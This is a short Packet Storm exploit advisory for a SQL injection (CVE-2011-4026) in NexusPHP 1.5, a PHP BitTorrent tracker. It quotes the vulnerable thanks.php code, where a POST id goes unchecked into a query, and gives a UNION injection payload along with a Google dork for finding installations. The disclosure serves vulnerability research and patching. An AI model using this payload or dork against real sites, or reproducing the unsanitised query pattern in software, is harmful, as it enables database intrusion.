NexusPHP 1.5 SQL Injection

2011-10-09T00:00:00
ID PACKETSTORM:105630
Type packetstorm
Reporter flyh4t
Modified 2011-10-09T00:00:00

Description

                                        
                                            `# Exploit Title: Nexusphp.v1.5 SQL injection Vulnerability  
# Google Dork: intitle:nexusphp  
# Date: 2011-10-08  
# Author: flyh4t  
# Software Link: http://sourceforge.net/projects/nexusphp/  
# Version: nexusphp.v1.5  
# Tested on: linux+apache  
# CVE : CVE-2011-4026  
  
  
Nexusphp is BitTorrent private tracker scripts written in PHP  
The codes is here http://sourceforge.net/projects/nexusphp/  
There is a sql injectiong Vulnerability in thanks.php.  
  
-----------------------vul code-------------------  
//thanks.php  
if ($_GET['id'])  
stderr("Party is over!", "This trick doesn't work anymore. You need to click the button!");  
$userid = $CURUSER["id"];  
$torrentid = $_POST["id"];  
$tsql = sql_query("SELECT owner FROM torrents where id=$torrentid");  
$arr = mysql_fetch_array($tsql);  
-----------------------vul code end-------------------  
  
$_POST["id"] is not checked, lead a sql injection Vulnerability  
  
-----------------------exploit-------------------  
  
_POST[id] : -1 union select version()>4/*  
  
-----------------------exploit end -------------------  
  
`